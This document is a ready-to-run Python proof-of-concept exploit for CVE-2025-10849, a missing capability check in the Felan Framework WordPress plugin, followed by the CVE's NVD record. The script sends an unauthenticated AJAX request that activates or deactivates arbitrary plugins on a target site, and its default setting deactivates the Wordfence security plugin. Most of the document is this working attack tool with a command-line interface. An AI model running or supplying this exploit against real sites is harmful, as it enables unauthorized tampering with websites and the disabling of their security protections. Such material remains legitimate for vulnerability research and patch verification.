CVE-2025-10849

#!/usr/bin/env python3 """ CVE-2025-10849 - Felan Framework Plugin Unauthorized Plugin Activation PoC This PoC demonstrates how an unauthenticated attacker can activate or deactivate arbitrary plugins on a WordPress site running vulnerable Felan Framework plugin (<= 1.1.4). """ import requests import sys import argparse def exploit(target_url, action, plugin_path): """ Exploit CVE-2025-10849 by calling the process_plugin_actions AJAX endpoint. :param target_url: Target WordPress site URL (e.g., http://example.com) :param action: Plugin action to perform ('activate' or 'deactivate') :param plugin_path: Plugin path (e.g., 'akismet/akismet.php') """ ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Build the payload for the AJAX action # The 'process_plugin_actions' handler does not check user capabilities payload = { "action": "process_plugin_actions", "plugin_action": action, "plugin": plugin_path, } print(f"[*] Target: {target_url}") print(f"[*] AJAX Endpoint: {ajax_url}") print(f"[*] Action: {action} plugin '{plugin_path}'") try: # Send the unauthenticated POST request response = requests.post(ajax_url, data=payload, timeout=10) print(f"[*] HTTP Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") # Check for typical success/failure indicators if response.status_code == 200: if "success" in response.text.lower() or response.text.strip() == "0" or response.text.strip() == "1": print(f"[+] Exploit may have succeeded! Plugin '{plugin_path}' {action}d.") else: print(f"[-] Response received but exploit status unclear.") else: print(f"[-] Unexpected status code: {response.status_code}") return response except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None if __name__ == "__main__": parser = argparse.ArgumentParser( description="CVE-2025-10849 - Felan Framework Unauthorized Plugin Activation" ) parser.add_argument( "-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com)" ) parser.add_argument( "-a", "--action", choices=["activate", "deactivate"], default="deactivate", help="Plugin action to perform (default: deactivate)" ) parser.add_argument( "-p", "--plugin", default="wordfence/wordfence.php", help="Target plugin path (default: wordfence/wordfence.php)" ) args = parser.parse_args() exploit(args.url, args.action, args.plugin)

{"cve": {"id": "CVE-2025-10849", "sourceIdentifier": "[email protected]", "published": "2025-10-16T07:15:32.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Felan Framework plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_plugin_actions' function called via an AJAX action in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to activate or deactivate arbitrary plugins."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://themeforest.net/item/felan-freelance-marketplace-and-job-board-wordpress-theme/53612955", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5abd601-132a-4d8b-bfcc-afd5c6ed9947?source=cve", "source": "[email protected]"}]}}